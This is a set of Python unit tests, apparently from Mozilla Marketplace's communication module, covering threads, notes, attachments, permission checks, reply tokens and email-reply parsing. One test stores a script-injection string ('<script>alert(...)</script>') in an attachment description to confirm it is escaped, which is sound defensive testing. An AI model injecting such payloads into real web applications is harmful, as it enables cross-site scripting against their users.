note_attach2 = note.attachments.get(filepath='rofl')
eq_(note_attach2.description, 'desc2')
eq_(note_attach2.mimetype, 'txt')
########NEW FILE########
__FILENAME__ = test_forms
from nose.tools import eq_
import amo.tests
from mkt.comm.forms import CreateCommThreadForm
from mkt.constants import comm
class TestCreateCommThreadForm(amo.tests.TestCase):
def setUp(self):
self.app = amo.tests.app_factory()
def _data(self, **kwargs):
data = {
'app': self.app.app_slug,
'version': self.app.current_version.version,
'note_type': comm.NO_ACTION,
'body': 'note body'
}
data.update(**kwargs)
return data
def test_basic(self):
data = self._data()
form = CreateCommThreadForm(data)
assert form.is_valid()
eq_(form.cleaned_data['app'], self.app)
eq_(form.cleaned_data['version'], self.app.current_version)
def test_version_does_not_exist(self):
data = self._data(version='1234.9')
form = CreateCommThreadForm(data)
assert not form.is_valid()
########NEW FILE########
__FILENAME__ = test_models
from datetime import datetime
from os import path
from django.core.urlresolvers import NoReverseMatch
from django.test.utils import override_settings
from nose.tools import eq_, ok_
from addons.models import Addon
import amo.tests
from users.models import UserProfile
from mkt.comm.models import (CommAttachment, CommunicationNote,
CommunicationThread, CommunicationThreadCC,
CommunicationThreadToken,
user_has_perm_app, user_has_perm_note,
user_has_perm_thread)
from mkt.comm.tests.test_views import CommTestMixin
from mkt.constants import comm as const
TESTS_DIR = path.dirname(path.abspath(__file__))
ATTACHMENTS_DIR = path.join(TESTS_DIR, 'attachments')
class PermissionTestMixin(object):
fixtures = ['base/addon_3615', 'base/user_999']
def setUp(self):
self.addon = Addon.objects.get()
self.user = UserProfile.objects.get(username='regularuser')
self.thread = CommunicationThread.objects.create(addon=self.addon)
self.author = UserProfile.objects.create(email='lol', username='lol')
self.note = CommunicationNote.objects.create(
thread=self.thread, author=self.author, note_type=0, body='xyz')
self.obj = None
def _eq_obj_perm(self, val):
if self.type == 'note':
eq_(user_has_perm_note(self.obj, self.user), val)
else:
eq_(user_has_perm_thread(self.obj, self.user), val)
def test_no_perm(self):
self._eq_obj_perm(False)
def test_has_perm_public(self):
self.obj.update(read_permission_public=True)
self._eq_obj_perm(True)
def test_has_perm_dev(self):
self.obj.update(read_permission_developer=True)
self.addon.addonuser_set.create(user=self.user)
self._eq_obj_perm(True)
def test_has_perm_rev(self):
self.obj.update(read_permission_reviewer=True)
self.grant_permission(self.user, 'Apps:Review')
self._eq_obj_perm(True)
def test_has_perm_senior_rev(self):
self.obj.update(read_permission_senior_reviewer=True)
self.grant_permission(self.user, 'Apps:ReviewEscalated')
self._eq_obj_perm(True)
def test_has_perm_moz_contact(self):
self.obj.update(read_permission_mozilla_contact=True)
self.addon.update(
mozilla_contact=','.join([self.user.email, '[email protected]']))
self._eq_obj_perm(True)
def test_has_perm_staff(self):
self.obj.update(read_permission_staff=True)
self.grant_permission(self.user, 'Admin:*')
self._eq_obj_perm(True)
class TestCommunicationNote(PermissionTestMixin, amo.tests.TestCase):
def setUp(self):
super(TestCommunicationNote, self).setUp()
self.type = 'note'
self.obj = self.note
def test_has_perm_author(self):
self.obj.update(author=self.user)
self._eq_obj_perm(True)
def test_manager(self):
eq_(CommunicationNote.objects.count(), 1)
eq_(CommunicationNote.objects.with_perms(self.user,
self.thread).count(), 0)
self.note.update(author=self.user)
eq_(CommunicationNote.objects.with_perms(self.user,
self.thread).count(), 1)
class TestCommunicationThread(PermissionTestMixin, amo.tests.TestCase):
def setUp(self):
super(TestCommunicationThread, self).setUp()
self.type = 'thread'
self.obj = self.thread
def test_has_perm_posted(self):
self.note.update(author=self.user)
self._eq_obj_perm(True)
def test_has_perm_cc(self):
CommunicationThreadCC.objects.create(user=self.user, thread=self.obj)
self._eq_obj_perm(True)
def test_has_perm_app_reviewer(self):
ok_(not user_has_perm_app(self.user, self.addon))
self.grant_permission(self.user, 'Apps:Review')
ok_(user_has_perm_app(self.user, self.addon))
def test_has_perm_app_developer(self):
ok_(not user_has_perm_app(self.user, self.addon))
self.addon.addonuser_set.create(user=self.user)
ok_(user_has_perm_app(self.user, self.addon))
class TestThreadTokenModel(amo.tests.TestCase):
fixtures = ['base/addon_3615', 'base/user_999']
def setUp(self):
addon = Addon.objects.get(pk=3615)
self.thread = CommunicationThread(addon=addon)
user = UserProfile.objects.all()[0]
self.token = CommunicationThreadToken(thread=self.thread, user=user)
self.token.modified = datetime.now()
self.token.use_count = 0
def test_live_thread_token_is_valid(self):
"""
Test `is_valid()` when the token is fresh (not expired).
"""
assert self.token.is_valid()
def test_expired_thread_token_is_valid(self):
"""
Test `is_valid()` when the token has expired.
"""
self.token.modified = self.days_ago(const.THREAD_TOKEN_EXPIRY + 1)
assert not self.token.is_valid()
def test_unused_token_is_valid(self):
"""
Test `is_valid()` when the token is unused.
"""
assert self.token.is_valid()
def test_max_used_thread_token_is_valid(self):
"""
Test `is_valid()` when the token has been fully used.
"""
self.token.use_count = const.MAX_TOKEN_USE_COUNT
assert not self.token.is_valid()
def test_reset_uuid(self):
"""
Test `reset_uuid()` generates a differ uuid.
"""
self.thread.save()
self.token.thread = self.thread
self.token.save()
uuid = self.token.uuid
assert uuid
self.token.reset_uuid()
assert self.token.uuid
assert uuid != self.token.uuid
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
class TestCommAttachment(amo.tests.TestCase, CommTestMixin):
fixtures = ['base/addon_3615']
XSS_STRING = 'MMM <script>alert(bacon);</script>'
def setUp(self):
self.user = amo.tests.user_factory(username='porkbelly')
amo.set_user(self.user)
self.profile = self.user
self.addon = Addon.objects.get()
self.version = self.addon.latest_version
self.thread = self._thread_factory()
self.note = self._note_factory(self.thread)
self.attachment1, self.attachment2 = self._attachments(self.note)
def _attachments(self, note):
"""
Create and return a tuple of CommAttachment instances.
"""
ala1 = CommAttachment.objects.create(note=note,
filepath='bacon.txt',
mimetype='text/plain')
ala2 = CommAttachment.objects.create(note=note,
filepath='bacon.jpg',
description=self.XSS_STRING,
mimetype='image/jpeg')
return ala1, ala2
def test_filename(self):
msg = 'CommAttachment().filename() returning incorrect filename.'
eq_(self.attachment1.filename(), 'bacon.txt', msg)
eq_(self.attachment2.filename(), 'bacon.jpg', msg)
def test_full_path_dirname(self):
msg = 'CommAttachment().full_path() returning incorrect path.'
FAKE_PATH = '/tmp/attachments/'
with self.settings(REVIEWER_ATTACHMENTS_PATH=FAKE_PATH):
eq_(self.attachment1.full_path(), FAKE_PATH + 'bacon.txt', msg)
eq_(self.attachment2.full_path(), FAKE_PATH + 'bacon.jpg', msg)
def test_display_name(self):
msg = ('CommAttachment().display_name() returning '
'incorrect display name.')
eq_(self.attachment1.display_name(), 'bacon.txt', msg)
def test_display_name_xss(self):
ok_('<script>' not in self.attachment2.display_name())
def test_is_image(self):
msg = 'CommAttachment().is_image() not correctly detecting images.'
eq_(self.attachment1.is_image(), False, msg)
eq_(self.attachment2.is_image(), True, msg)
def test_get_absolute_url(self):
try:
self.attachment1.get_absolute_url()
self.attachment2.get_absolute_url()
except NoReverseMatch:
assert False, 'CommAttachment.get_absolute_url NoReverseMatch'
########NEW FILE########
__FILENAME__ = test_utils_
import os.path
from django.conf import settings
from django.core.files.uploadedfile import SimpleUploadedFile
import mock
from nose.tools import eq_
import amo
from amo.tests import app_factory, TestCase, user_factory
from users.models import UserProfile
from mkt.comm.forms import CommAttachmentFormSet
from mkt.comm.models import CommunicationThread, CommunicationThreadToken
from mkt.comm.tests.test_views import AttachmentManagementMixin
from mkt.comm.utils import (CommEmailParser, create_comm_note,
save_from_email_reply)
from mkt.constants import comm
from mkt.site.fixtures import fixture
sample_email = os.path.join(settings.ROOT, 'mkt', 'comm', 'tests',
'email.txt')
class TestEmailReplySaving(TestCase):
fixtures = fixture('user_999')
def setUp(self):
app = app_factory(name='Antelope', status=amo.STATUS_PENDING)
self.profile = UserProfile.objects.get(pk=999)
t = CommunicationThread.objects.create(addon=app,
version=app.current_version, read_permission_reviewer=True)
self.create_switch('comm-dashboard')
self.token = CommunicationThreadToken.objects.create(thread=t,
user=self.profile)
self.token.update(uuid='5a0b8a83d501412589cc5d562334b46b')
self.email_base64 = open(sample_email).read()
self.grant_permission(self.profile, 'Apps:Review')
def test_successful_save(self):
note = save_from_email_reply(self.email_base64)
assert note
eq_(note.body, 'test note 5\n')
def test_with_max_count_token(self):
# Test with an invalid token.
self.token.update(use_count=comm.MAX_TOKEN_USE_COUNT + 1)
assert not save_from_email_reply(self.email_base64)
def test_with_unpermitted_token(self):
"""Test when the token's user does not have a permission on thread."""
self.profile.groupuser_set.filter(
group__rules__contains='Apps:Review').delete()
assert not save_from_email_reply(self.email_base64)
def test_non_existent_token(self):
self.token.update(uuid='youtube?v=wn4RP57Y7bw')
assert not save_from_email_reply(self.email_base64)
def test_with_invalid_msg(self):
assert not save_from_email_reply('youtube?v=WwJjts9FzxE')
class TestEmailParser(TestCase):
def setUp(self):
email_text = open(sample_email).read()
self.parser = CommEmailParser(email_text)
def test_uuid(self):
eq_(self.parser.get_uuid(), '5a0b8a83d501412589cc5d562334b46b')
def test_body(self):
eq_(self.parser.get_body(), 'test note 5\n')
class TestCreateCommNote(TestCase, AttachmentManagementMixin):
def setUp(self):
self.create_switch('comm-dashboard')
self.contact = user_factory(username='contact')
self.user = user_factory()
self.grant_permission(self.user, '*:*')
self.app = app_factory(mozilla_contact=self.contact.email)
def test_create_thread(self):
# Default permissions.
thread, note = create_comm_note(
self.app, self.app.current_version, self.user, 'huehue',
note_type=comm.APPROVAL)
# Check Thread.
eq_(thread.addon, self.app)
eq_(thread.version, self.app.current_version)
expected = {
'public': False, 'developer': True, 'reviewer': True,
'senior_reviewer': True, 'mozilla_contact': True, 'staff': True}
for perm, has_perm in expected.items():
eq_(getattr(thread, 'read_permission_%s' % perm), has_perm, perm)
# Check Note.
eq_(note.thread, thread)
eq_(note.author, self.user)
eq_(note.body, 'huehue')
eq_(note.note_type, comm.APPROVAL)
# Check CC.
eq_(thread.thread_cc.count(), 2)
assert thread.thread_cc.filter(user=self.contact).exists()
assert thread.thread_cc.filter(user=self.user).exists()
# Check Reads.
eq_(note.read_by_users.count(), 2)
def test_create_note_existing_thread(self):
# Initial note.
thread, note = create_comm_note(
self.app, self.app.current_version, self.user, 'huehue')
# Second note from contact.
thread, reply = create_comm_note(
self.app, self.app.current_version, self.contact, 'euheuh!',
note_type=comm.REJECTION)
# Mark read by author.
eq_(reply.read_by_users.count(), 1)
# Third person joins thread.
thread, last_word = create_comm_note(
self.app, self.app.current_version, user_factory(), 'euheuh!',
note_type=comm.MORE_INFO_REQUIRED)
# More checking that joining a thread marks all old notes as read.
eq_(thread.thread_cc.count(), 3)
eq_(note.read_by_users.count(), 3)
eq_(last_word.read_by_users.count(), 1)
@mock.patch('mkt.comm.utils.post_create_comm_note', new=mock.Mock)
def test_custom_perms(self):
thread, note = create_comm_note(
self.app, self.app.current_version, self.user, 'escalatedquickly',
note_type=comm.ESCALATION, perms={'developer': False,
'staff': True})
expected = {
'public': False, 'developer': False, 'reviewer': True,
'senior_reviewer': True, 'mozilla_contact': True, 'staff': True}
for perm, has_perm in expected.items():
eq_(getattr(thread, 'read_permission_%s' % perm), has_perm, perm)
@mock.patch('mkt.comm.utils.post_create_comm_note', new=mock.Mock)
def test_attachments(self):
attach_formdata = self._attachment_management_form(num=2)
attach_formdata.update(self._attachments(num=2))
attach_formset = CommAttachmentFormSet(
attach_formdata,
{'form-0-attachment':
SimpleUploadedFile(
'lol', attach_formdata['form-0-attachment'].read()),
'form-1-attachment':
SimpleUploadedFile(
'lol2', attach_formdata['form-1-attachment'].read())})
thread, note = create_comm_note(
self.app, self.app.current_version, self.user, 'lol',
note_type=comm.APPROVAL, attachments=attach_formset)
eq_(note.attachments.count(), 2)
########NEW FILE########
__FILENAME__ = test_views
import json
import os
from django.conf import settings
from django.core import mail
from django.core.urlresolvers import reverse
from django.test.client import MULTIPART_CONTENT
from django.test.utils import override_settings
import mock
from nose.exc import SkipTest
from nose.tools import eq_, ok_
from amo.tests import (addon_factory, req_factory_factory, user_factory,
version_factory)
from users.models import UserProfile
import mkt.constants.comm
from mkt.api.tests.test_oauth import RestOAuth
from mkt.comm.views import EmailCreationPermission, post_email, ThreadPermission
from mkt.comm.models import (CommAttachment, CommunicationNote,
CommunicationThread, CommunicationThreadCC)
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
TESTS_DIR = os.path.dirname(os.path.abspath(__file__))
ATTACHMENTS_DIR = os.path.join(TESTS_DIR, 'attachments')
class CommTestMixin(object):
def _thread_factory(self, note=False, perms=None, no_perms=None, **kw):
create_perms = {}
for perm in perms or []:
create_perms['read_permission_%s' % perm] = True
for perm in no_perms or []:
create_perms['read_permission_%s' % perm] = False
kw.update(create_perms)
thread = self.addon.threads.create(**kw)
if note:
self._note_factory(thread)
CommunicationThreadCC.objects.create(user=self.profile,
thread=thread)
return thread
def _note_factory(self, thread, perms=None, no_perms=None, **kw):
author = kw.pop('author', self.profile)
body = kw.pop('body', 'something')
create_perms = {}
for perm in perms or []:
create_perms['read_permission_%s' % perm] = True
for perm in no_perms or []:
create_perms['read_permission_%s' % perm] = False
kw.update(create_perms)
return thread.notes.create(author=author, body=body, **kw)
class AttachmentManagementMixin(object):
def _attachment_management_form(self, num=1):
"""
Generate and return data for a management form for `num` attachments
"""
return {'form-TOTAL_FORMS': max(1, num),
'form-INITIAL_FORMS': 0,
'form-MAX_NUM_FORMS': 1000}
def _attachments(self, num):
"""Generate and return data for `num` attachments """
data = {}
files = ['bacon.jpg', 'bacon.txt']
descriptions = ['mmm, bacon', '']
for n in xrange(num):
i = 0 if n % 2 else 1
path = os.path.join(ATTACHMENTS_DIR, files[i])
attachment = open(path, 'r')
data.update({
'form-%d-attachment' % n: attachment,
'form-%d-description' % n: descriptions[i]
})
return data
class TestThreadDetail(RestOAuth, CommTestMixin):
fixtures = fixture('webapp_337141', 'user_2519', 'user_support_staff')
def setUp(self):
super(TestThreadDetail, self).setUp()
self.addon = Webapp.objects.get(pk=337141)
def check_permissions(self, thread):
req = req_factory_factory(
reverse('comm-thread-detail', kwargs={'pk': thread.pk}),
user=self.profile)
return ThreadPermission().has_object_permission(
req, 'comm-thread-detail', thread)
def test_response(self):
thread = self._thread_factory(note=True)
res = self.client.get(
reverse('comm-thread-detail', kwargs={'pk': thread.pk}))
eq_(res.status_code, 200)
eq_(len(res.json['recent_notes']), 1)
eq_(res.json['addon'], self.addon.id)
def test_recent_notes_perm(self):
staff = UserProfile.objects.get(username='support_staff')
self.addon.addonuser_set.create(user=self.profile)
thread = self._thread_factory(read_permission_developer=True)
self._note_factory(
thread, perms=['developer'], author=staff, body='allowed')
no_dev_note = self._note_factory(
thread, no_perms=['developer'], author=staff)
# Test that the developer can't access no-developer note.
res = self.client.get(
reverse('comm-thread-detail', kwargs={'pk': thread.pk}))
eq_(res.status_code, 200)
eq_(len(res.json['recent_notes']), 1)
eq_(res.json['recent_notes'][0]['body'], 'allowed')
eq_(res.json['addon'], self.addon.id)
# Test that the author always has permissions.
no_dev_note.update(author=self.profile)
res = self.client.get(
reverse('comm-thread-detail', kwargs={'pk': thread.pk}))
eq_(len(res.json['recent_notes']), 2)
def test_cc(self):
# Test with no CC.
thread = self._thread_factory()
assert not self.check_permissions(thread)
# Test with CC created.
thread.thread_cc.create(user=self.profile)
assert self.check_permissions(thread)
def test_addon_dev_allowed(self):
thread = self._thread_factory(perms=['developer'])
self.addon.addonuser_set.create(user=self.profile)
assert self.check_permissions(thread)
def test_addon_dev_denied(self):
"""Test when the user is a developer of a different add-on."""
thread = self._thread_factory(perms=['developer'])
self.profile.addonuser_set.create(addon=addon_factory())
assert not self.check_permissions(thread)
def test_read_public(self):
thread = self._thread_factory(perms=['public'])
assert self.check_permissions(thread)
def test_read_moz_contact(self):
thread = self._thread_factory(perms=['mozilla_contact'])
self.addon.update(mozilla_contact=self.profile.email)
assert self.check_permissions(thread)
def test_read_reviewer(self):
thread = self._thread_factory(perms=['reviewer'])
self.grant_permission(self.profile, 'Apps:Review')
assert self.check_permissions(thread)
def test_read_senior_reviewer(self):
thread = self._thread_factory(perms=['senior_reviewer'])
self.grant_permission(self.profile, 'Apps:ReviewEscalated')
assert self.check_permissions(thread)
def test_read_staff(self):
thread = self._thread_factory(perms=['staff'])
self.grant_permission(self.profile, 'Admin:%')
assert self.check_permissions(thread)
def test_cors_allowed(self):
thread = self._thread_factory()
res = self.client.get(
reverse('comm-thread-detail', kwargs={'pk': thread.pk}))
self.assertCORS(res, 'get', 'post', 'patch')
def test_mark_read(self):
thread = self._thread_factory()
note1 = self._note_factory(thread)
note2 = self._note_factory(thread)
res = self.client.patch(
reverse('comm-thread-detail', kwargs={'pk': thread.pk}),
data=json.dumps({'is_read': True}))
eq_(res.status_code, 204)
assert note1.read_by_users.filter(pk=self.profile.pk).exists()
assert note2.read_by_users.filter(pk=self.profile.pk).exists()
def test_review_url(self):
thread = self._thread_factory(note=True)
res = self.client.get(
reverse('comm-thread-detail', kwargs={'pk': thread.pk}))
eq_(res.status_code, 200)
eq_(res.json['addon_meta']['review_url'],
reverse('reviewers.apps.review', args=[self.addon.app_slug]))
def test_version_number(self):
version = version_factory(addon=self.addon, version='7.12')
thread = CommunicationThread.objects.create(
addon=self.addon, version=version, read_permission_public=True)
res = self.client.get(reverse('comm-thread-detail', args=[thread.pk]))
eq_(json.loads(res.content)['version_number'], '7.12')
eq_(json.loads(res.content)['version_is_obsolete'], False)
version.delete()
res = self.client.get(reverse('comm-thread-detail', args=[thread.pk]))
eq_(json.loads(res.content)['version_number'], '7.12')
eq_(json.loads(res.content)['version_is_obsolete'], True)
def test_app_threads(self):
version1 = version_factory(addon=self.addon, version='7.12')
thread1 = CommunicationThread.objects.create(
addon=self.addon, version=version1, read_permission_public=True)
version2 = version_factory(addon=self.addon, version='1.16')
thread2 = CommunicationThread.objects.create(
addon=self.addon, version=version2, read_permission_public=True)
for thread in (thread1, thread2):
res = self.client.get(reverse('comm-thread-detail',
args=[thread.pk]))
eq_(res.status_code, 200)
eq_(json.loads(res.content)['app_threads'],
[{"id": thread2.id, "version__version": version2.version},
{"id": thread1.id, "version__version": version1.version}])
class TestThreadList(RestOAuth, CommTestMixin):
fixtures = fixture('webapp_337141', 'user_2519')
def setUp(self):
super(TestThreadList, self).setUp()
self.create_switch('comm-dashboard')
self.addon = Webapp.objects.get(pk=337141)
self.list_url = reverse('comm-thread-list')
def test_response(self):
"""Test the list response, we don't want public threads in the list."""
self._thread_factory(note=True, perms=['public'])
res = self.client.get(self.list_url)
eq_(res.status_code, 200)
eq_(len(res.json['objects']), 1)
def test_addon_filter(self):
self._thread_factory(note=True)
self.grant_permission(self.user, 'Apps:Review')
res = self.client.get(self.list_url, {'app': '337141'})
eq_(res.status_code, 200)
eq_(len(res.json['objects']), 1)
# This add-on doesn't exist.
res = self.client.get(self.list_url, {'app': '1000'})
eq_(res.status_code, 404)
def test_app_slug(self):
thread = CommunicationThread.objects.create(addon=self.addon)
CommunicationNote.objects.create(author=self.profile, thread=thread,
note_type=0, body='something')
self.grant_permission(self.user, 'Apps:Review')
res = self.client.get(self.list_url, {'app': self.addon.app_slug})
eq_(res.status_code, 200)
eq_(res.json['objects'][0]['addon_meta']['app_slug'],
self.addon.app_slug)
def test_app_threads(self):
version1 = version_factory(addon=self.addon, version='7.12')
thread1 = CommunicationThread.objects.create(
addon=self.addon, version=version1, read_permission_public=True)
CommunicationThreadCC.objects.create(user=self.profile, thread=thread1)
version2 = version_factory(addon=self.addon, version='1.16')
thread2 = CommunicationThread.objects.create(
addon=self.addon, version=version2, read_permission_public=True)
CommunicationThreadCC.objects.create(user=self.profile, thread=thread2)
self.grant_permission(self.user, 'Apps:Review')
res = self.client.get(self.list_url, {'app': self.addon.app_slug})
eq_(res.status_code, 200)
eq_(res.json['app_threads'],
[{'id': thread2.id, 'version__version': version2.version},
{'id': thread1.id, 'version__version': version1.version}])
def test_create(self):
self.create_switch('comm-dashboard')
version_factory(addon=self.addon, version='1.1')
data = {
'app': self.addon.app_slug,
'version': '1.1',
'note_type': '0',
'body': 'flylikebee'
}
self.addon.addonuser_set.create(user=self.user)
res = self.client.post(self.list_url, data=json.dumps(data))
eq_(res.status_code, 201)
assert self.addon.threads.count()
@mock.patch('waffle.switch_is_active')
def test_create_no_switch(self, waffle_mock):
waffle_mock.return_value = False
version_factory(addon=self.addon, version='1.1')
data = {
'app': self.addon.app_slug,
'version': '1.1',
'note_type': '0',
'body': 'flylikebee'
}
self.addon.addonuser_set.create(user=self.user)
res = self.client.post(self.list_url, data=json.dumps(data))
eq_(res.status_code, 403)
class NoteSetupMixin(RestOAuth, CommTestMixin, AttachmentManagementMixin):
fixtures = fixture('webapp_337141', 'user_2519', 'user_999',
'user_support_staff')
def setUp(self):
super(NoteSetupMixin, self).setUp()
self.create_switch('comm-dashboard')
self.addon = Webapp.objects.get(pk=337141)
self.thread = self._thread_factory(
perms=['developer'], version=self.addon.current_version)
self.thread_url = reverse(
'comm-thread-detail', kwargs={'pk': self.thread.id})
self.list_url = reverse(
'comm-note-list', kwargs={'thread_id': self.thread.id})
self.profile.addonuser_set.create(addon=self.addon)
class TestNote(NoteSetupMixin):
@override_settings(REVIEWER_ATTACHMENTS_PATH=TESTS_DIR)
def test_response(self):
note = self._note_factory(self.thread)
attach = note.attachments.create(filepath='test_views.py',
description='desc')
res = self.client.get(reverse(
'comm-note-detail',
kwargs={'thread_id': self.thread.id, 'pk': note.id}))
eq_(res.status_code, 200)
eq_(res.json['body'], 'something')
eq_(res.json['is_read'], False)
# Read.
note.mark_read(self.profile)
res = self.client.get(reverse('comm-note-detail',
kwargs={'thread_id': self.thread.id,
'pk': note.id}))
eq_(res.json['is_read'], True)
# Attachments.
eq_(len(res.json['attachments']), 1)
eq_(res.json['attachments'][0]['url'],
settings.SITE_URL +
reverse('comm-attachment-detail', args=[note.id, attach.id]))
eq_(res.json['attachments'][0]['display_name'], 'desc')
ok_(not res.json['attachments'][0]['is_image'])
def test_show_read_filter(self):
"""Test `is_read` filter."""
note = self._note_factory(self.thread)
note.mark_read(self.profile)
# Test with `show_read=true`.
res = self.client.get(self.list_url, {'show_read': 'truey'})
eq_(res.json['objects'][0]['is_read'], True)
res = self.client.get(self.list_url, {'show_read': '0'})
ok_(not res.json['objects'])
# Test with `show_read=false`.
note.reads_set.all().delete()
res = self.client.get(self.list_url, {'show_read': '0'})
eq_(res.json['objects'][0]['is_read'], False)
def test_read_perms(self):
staff = UserProfile.objects.get(username='support_staff')
self._note_factory(
self.thread, perms=['developer'], author=staff, body='oncetoldme')
no_dev_note = self._note_factory(
self.thread, no_perms=['developer'], author=staff)
res = self.client.get(self.list_url)
eq_(res.status_code, 200)
eq_(len(res.json['objects']), 1)
eq_(res.json['objects'][0]['body'], 'oncetoldme')
# Test that the author always has permissions.
no_dev_note.update(author=self.profile)
res = self.client.get(self.list_url)
eq_(len(res.json['objects']), 2)
def test_create(self):
res = self.client.post(self.list_url, data=json.dumps(
{'note_type': '0', 'body': 'something'}))
eq_(res.status_code, 201)
eq_(res.json['body'], 'something')
# Decrement authors.count() by 1 because the author of the note is
# one of the authors of the addon.
eq_(len(mail.outbox), self.thread.addon.authors.count() - 1)
def test_create_no_perm(self):
self.thread.update(read_permission_developer=False)
res = self.client.post(self.list_url, data=json.dumps(
{'note_type': '0', 'body': 'something'}))
eq_(res.status_code, 403)
@mock.patch('waffle.switch_is_active')
def test_create_no_switch(self, waffle_mock):
waffle_mock.return_value = False
res = self.client.post(self.list_url, data=json.dumps(
{'note_type': '0', 'body': 'something'}))
eq_(res.status_code, 403)
def test_cors_allowed(self):
res = self.client.get(self.list_url)
self.assertCORS(res, 'get', 'post', 'patch')
def test_mark_read(self):
note = self._note_factory(self.thread)
note.mark_read(self.profile)
res = self.client.patch(
reverse('comm-note-detail',
kwargs={'thread_id': self.thread.id,
'pk': note.id}),
data=json.dumps({'is_read': True}))
eq_(res.status_code, 204)
assert note.read_by_users.filter(pk=self.profile.pk).exists()
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
class TestAttachments(NoteSetupMixin):
def setUp(self):
super(TestAttachments, self).setUp()
self.note = self._note_factory(self.thread, author=self.profile)
self.attachment_url = reverse(
'comm-attachment-list', kwargs={'note_id': self.note.id})
def test_cors_bad_request(self):
res = self.client.post(self.attachment_url, data={},
content_type=MULTIPART_CONTENT)
eq_(res.status_code, 400)
self.assertCORS(res, 'get', 'post')
def _save_attachment_mock(self, storage, attachment, filepath):
if 'jpg' in filepath:
return 'bacon.jpg'
return 'bacon.txt'
@mock.patch('mkt.comm.utils._save_attachment')
def test_create_attachment(self, _mock):
_mock.side_effect = self._save_attachment_mock
data = self._attachments(num=2)
res = self.client.post(self.attachment_url, data=data,
content_type=MULTIPART_CONTENT)
eq_(res.status_code, 201)
eq_(CommAttachment.objects.count(), 2)
attach1 = CommAttachment.objects.all()[0]
eq_(attach1.note, self.note)
eq_(attach1.filepath, 'bacon.txt')
eq_(attach1.description, '')
assert not attach1.is_image()
attach2 = CommAttachment.objects.all()[1]
eq_(attach2.note, self.note)
eq_(attach2.filepath, 'bacon.jpg')
eq_(attach2.description, 'mmm, bacon')
assert attach2.is_image()
@mock.patch.object(mkt.constants.comm, 'MAX_ATTACH', 1)
def test_max_attach(self):
data = self._attachments(num=2)
res = self.client.post(self.attachment_url, data=data,
content_type=MULTIPART_CONTENT)
eq_(res.status_code, 400)
def test_not_note_owner(self):
self.note.update(author=user_factory())
data = self._attachments(num=2)
res = self.client.post(self.attachment_url, data=data,
content_type=MULTIPART_CONTENT)
eq_(res.status_code, 403)
@mock.patch('mkt.comm.utils._save_attachment', new=mock.Mock())
@mock.patch('mkt.comm.models.CommAttachment.is_image', new=mock.Mock())
def test_get_attachment(self):
if not settings.XSENDFILE:
raise SkipTest
data = self._attachments(num=1)
res = self.client.post(self.attachment_url, data=data,
content_type=MULTIPART_CONTENT)
attachment_id = res.json['attachments'][0]['id']
get_attachment_url = reverse('comm-attachment-detail',
args=[self.note.id, attachment_id])
res = self.client.get(get_attachment_url)
eq_(res.status_code, 200)
eq_(res._headers['x-sendfile'][1],
CommAttachment.objects.get(id=attachment_id).full_path())
@mock.patch('mkt.comm.utils._save_attachment', new=mock.Mock())
@mock.patch('mkt.comm.models.CommAttachment.is_image', new=mock.Mock())
def test_get_attachment_not_note_perm(self):
data = self._attachments(num=1)
res = self.client.post(self.attachment_url, data=data,
content_type=MULTIPART_CONTENT)
attachment_id = res.json['attachments'][0]['id']
# Remove perms.
self.note.update(author=user_factory())
self.profile.addonuser_set.all().delete()
get_attachment_url = reverse('comm-attachment-detail',
args=[self.note.id, attachment_id])
res = self.client.get(get_attachment_url)
eq_(res.status_code, 403)
@mock.patch.object(settings, 'WHITELISTED_CLIENTS_EMAIL_API',
['10.10.10.10'])
@mock.patch.object(settings, 'POSTFIX_AUTH_TOKEN', 'something')
class TestEmailApi(RestOAuth):
def get_request(self, data=None):
req = req_factory_factory(reverse('post-email-api'), self.profile)
req.META['REMOTE_ADDR'] = '10.10.10.10'
req.META['HTTP_POSTFIX_AUTH_TOKEN'] = 'something'
req.POST = dict(data) if data else dict({})
req.method = 'POST'
return req
def test_allowed(self):
assert EmailCreationPermission().has_permission(self.get_request(),
None)
def test_ip_denied(self):
req = self.get_request()
req.META['REMOTE_ADDR'] = '10.10.10.1'
assert not EmailCreationPermission().has_permission(req, None)
def test_token_denied(self):
req = self.get_request()
req.META['HTTP_POSTFIX_AUTH_TOKEN'] = 'somethingwrong'
assert not EmailCreationPermission().has_permission(req, None)
@mock.patch('mkt.comm.tasks.consume_email.apply_async')
def test_successful(self, _mock):
req = self.get_request({'body': 'something'})
res = post_email(req)
_mock.assert_called_with(('something',))
eq_(res.status_code, 201)
def test_bad_request(self):
"""Test with no email body."""
res = post_email(self.get_request())
eq_(res.status_code, 400)
class TestCommCC(RestOAuth, CommTestMixin):
fixtures = fixture('webapp_337141', 'user_2519', 'user_support_staff')
def setUp(self):
super(TestCommCC, self).setUp()
self.addon = Webapp.objects.get(pk=337141)
self.profile = UserProfile.objects.get(id=2519)
def test_delete(self):
thread = self._thread_factory()
ok_(thread.thread_cc.create(user=self.profile))
res = self.client.delete(
reverse('comm-thread-cc-detail', args=[thread.id]))
eq_(res.status_code, 204)
eq_(CommunicationThreadCC.objects.count(), 0)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from rest_framework.routers import DefaultRouter
from mkt.comm.views import (AttachmentViewSet, NoteViewSet, post_email,
ThreadCCViewSet, ThreadViewSet)
api_thread = DefaultRouter()
api_thread.register(r'thread', ThreadViewSet, base_name='comm-thread')
api_thread.register(r'thread/(?P<thread_id>\d+)/note', NoteViewSet,
base_name='comm-note')
api_thread.register(
r'thread/subscribe', ThreadCCViewSet, base_name='comm-thread-cc')
api_thread.register(
r'note/(?P<note_id>\d+)/attachment',
AttachmentViewSet, base_name='comm-attachment')
api_patterns = patterns('',
url(r'^comm/', include(api_thread.urls)),
url(r'^comm/email/', post_email, name='post-email-api')
)
########NEW FILE########
__FILENAME__ = utils
import base64
import urllib2
from email import message_from_string
from email.utils import parseaddr
from django.conf import settings
from django.core.files.storage import get_storage_class
import commonware.log
import waffle
from email_reply_parser import EmailReplyParser
from access.models import Group
from users.models import UserProfile
from mkt.comm.models import (CommunicationNoteRead, CommunicationThreadToken,
user_has_perm_thread)
from mkt.constants import comm
log = commonware.log.getLogger('comm')
class CommEmailParser(object):
"""Utility to parse email replies."""
address_prefix = comm.REPLY_TO_PREFIX
def __init__(self, email_text):
"""Decode base64 email and turn it into a Django email object."""
try:
email_text = base64.standard_b64decode(
urllib2.unquote(email_text.rstrip()))
except TypeError:
# Corrupt or invalid base 64.
